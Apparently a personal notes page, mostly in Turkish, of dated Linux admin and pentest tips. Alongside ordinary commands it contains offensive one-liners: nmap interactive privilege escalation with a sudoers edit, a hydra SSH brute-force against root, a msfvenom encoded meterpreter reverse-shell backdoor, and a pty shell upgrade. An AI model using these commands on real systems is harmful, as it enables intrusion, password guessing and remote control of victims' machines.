notes.txt

!!  To Search : CTRL+ F   !!


File transfer with ssh on linux command line
scp -r /path/source/remoteServer@IpAdress:/path/destination


2020

Linux Sistemlerde IP Forwarding Özelliğinin Yönetimi
  • Ip Forwarding Özelliğinin Durumunu Sorgulamak İçin : sysctl net.ipv4.ip_forward
  • Ip Forwarding Özelliğini Açmak İçin : echo 1 > /proc/sys/net/ipv4/ip_forward
  • Ip Forwarding Özelliğini Kapatmak İçin : echo 0 > /proc/sys/net/ipv4/ip_forward
  • Ip Forwarding Özelliği Kalıcı Olarak Açmak İçin : /etc/sysctl.conf dosyası içerisindeki #net.ipv4.ip_forward=1 ifadesinin başındaki # karakterinin kaldırılması ve ağ servisinin yeniden başlatılması gereklidir.
  • Ağ Servisini Yeniden Başlatmak İçin : service network restart

2020

Yaygın Olarak Kullanılan Pentest Araçları

https://prune2000.github.io/tools/pentest/


2020

CMDCHALLENGE

cmdchallenge.com sitesi üzerinden online olarak komut satırı üzerindeki hakimiyet geliştirilebilir. Özellikle yeni başlayanlar için yararlı olabileceğini düşünüyorum.

https://cmdchallenge.com/


2020

SVC War Conpensator

Statik bir VAR dengeleyici, yüksek voltajlı elektrik iletim şebekelerinde hızlı etkili reaktif güç sağlamak için bir dizi elektrikli cihazdır. SVC’ler voltajı, güç faktörünü, harmonikleri düzenleyen ve sistemi stabilize eden Esnek AC iletim sistemi cihazı ailesinin bir parçasıdır.


31.03.2020

$PATH

Terminalden komutlarının çalıştırılabilir dosya karşılıklarının bulunduğu dizinleri belirtir.

Eğer oluşturduğumuz bir scripti terminal üzerinden istediğimiz herhangibir dizindeyken çalıştırabilmek için script dosyamızı executable izin ayarlarını yaparak PATH’a belirttiğimiz /bin dosyasına eklememiz gerekir.

Geçerli terminal için komut eklemek istiyorsak, ilgili dizinimizi belirterek bu komutu çalıştırmamız gerekiyor.

export PATH=”/home/hbn/bin:$PATH”

Eğer sürekli olarak tüm shell’de kullanmak için bir komut eklemesi yapacaksak bu komutu .bashrc dosyasına eklemeliyiz.


25/12/2019

OPENDNS

OpenDns adresleri kullanılarak lokal erişim engelleri aşılabilir.

208.67.222.222 , 208.67.220.220


28/11/2019

MSI Steelseries Keyboard Manage for Linux Systems

Script Link and Man File


30/10/2019

Basic Linux Privilege Escalation

Content Link


17/07/2019

NetMRI Shell Escape / Privilege Escalation

Description Link


26/06/2019

Manual of Sqlmap

https://github.com/sqlmapproject/sqlmap/wiki/Usage


20/06/2019

Python RegEx (Regular Expression) Online Deneme Platformları

www.regex101.com

www.regexr.com


16/04/2019

Linux Sistemlerde  DNS Ön Bellek Temizleme

>> Linux işletim sistemi kullanılan bilgisayarlarda DNS ön belleğini temizlemek için aşağıdaki komutlardan bir tanesini kullanabilirsiniz.

/etc/rc.d/init.d/nscd restart

nscd -i hosts


02/01/2019

SSH Bağlantısı Uzun Sürüyorsa …

>> SSH (Secure Shell) bağlantısının uzun bir zaman alması durumunda yani ssh login durumunda olması gerektiğinden daha uzun süre bekleniyorsa  birşeylerin yolunda gitmediği düşünebilirsiniz.
Bu durumda yapmanız gereken CONFIG dosyasına aşağıdaki satırı eklemektir.

"UseDNS no"


25 Aralık 2018

nmap-interactive İle Yetki Yükseltme

[normaluser@localhost]$ nmap –interactive
nmap>
!sh       (sh kabuğuna geçerek komut çalıştırma.)
# whoami
root

Bu kısımda interactive uygulama elede ettikten sonra

vim /etc/sudoers

dosyasına erişip mevcut erişimimizin olduğu kullanıcıya root haklarını tanımlayabiliriz.


25 Aralık 2018

SSH Bağlantısı Kurmak İçin Kullanılan Komut

ssh [kullanıcı_adı]@IP_Adresi
Örneğin;
ssh user@192.168.56.102


22 Aralık 2018

SSH Portu Üzerinden Sunucuya Brute Force Saldırısı

hydra -t 40 -V -f -l root -x 3:7aA1.*-_@$&% [IP_Adresi] ssh

Komut kullanılarak Brute Force Saldırısı başlatılır.

-t 40 parametresi : 40 thread üzerinden root kullanıcısına parola deneme saldırısı yapılıyor.
-V parametresi : Deneme/Yanılma sonuçlarını ekrana yazdırıyoruz
-f parametresi : finish anlamına gelir.Parola eşleşmesi olursa saldırıyı durdurur.
-x parametresi : Saldırıda kullanılacak karakterler setini tanımlıyoruz.
(3:7) parametresi : Maksimum ve minimum parola uzunluklarını belirtiyoruz.

a —> a’dan z’ye kadar küçük harfler
A —> A’dan Z’ye kadar büyük harfler
1 —> 0 ile 9 arası sayı değerleri
.*-_@$&%  —> Doğrudan tanımlanan özel karakterler

Bu saldırıda parola bilgisini elde etme garantisi verilebilir fakat işlem süresi mantık çerçevesini aşmaktadır.
Yaklaşık olarak 380.215.245.168.359 tane deneme söz konusudur.


19 Aralık 2018

Registry ShellBags

Windows işletim sistemi dosyaların boyutunu, sembollerini, adlarını ve mevcut klasörlerinin konumlarını (dizin bilgileri) Windows Explorer’da görüntüleyebilmek amacıyla ShallBag isimli  registry dosyaları tutar.
İlgili dosyanın silinmesi durumunda bile bilgiler shallbag‘de tutulmaktadır.

HKEY_USERS / [Kullanıcı_adı] / Software / Microsoft / Windows / Shell


19 Aralık 2018

Outlook OST Dosyalarının Önemi !

Bu dosyalar Outlook Veri Dosyalarıdır.OST dosyaları çevrimdışı çalışmak ve varsayılan olarak ön belleğe alınmış olan Exchange modu kullanmak isterseniz işinize yarar.

Adli Bilişimci Gözünden : E-mail verileri , takvim içerikleri, hatırlatmalar gibi bilgileri OST dosyalarından elde edebiliriz.


17 Aralık 2018

Linux Üzerinden Uzak Mysql Sunucuya Bağlanma

mysql -h [Hedef IP Adresi] -u [Kullanıcı Adı] -p [Parola]


16 Aralık 2018

Linux Klavye Dilini Türkçe Olarak Değiştirme

setxkbmap tr


10 Aralık 2018

Mfsvenom ile Windows Platformlar için Backdoor Oluşturma

msfvenom -p windows/meterpreter/reverse_tcp LHOST=[IP adresiniz] LPORT=[İletişimin kurulacağı port no] -f exe –platform windows -o /root/Desktop/backdoor.exe -e x86/shikata_ga_nai -i 20


3 Aralık 2018

Shell Alınan Sistemde Terminalin Spawn Edilmesi

Shell alınan bir sistemde Pseudo-terminal will not be allocated because stdin is not a terminal hatası alabiliriz.Bunun anlamı erişilen terminalin gerçek sistem terminali olmadığının fark edilmesidir.Bu hatayı atlatmak ve python pty.spawn ile gerçek bir terminal başlatmak için aşağıdaki komutu kullanabiliriz.

/use/bin/python -c ‘import pty; pty.spawn(“/bin/bash”)’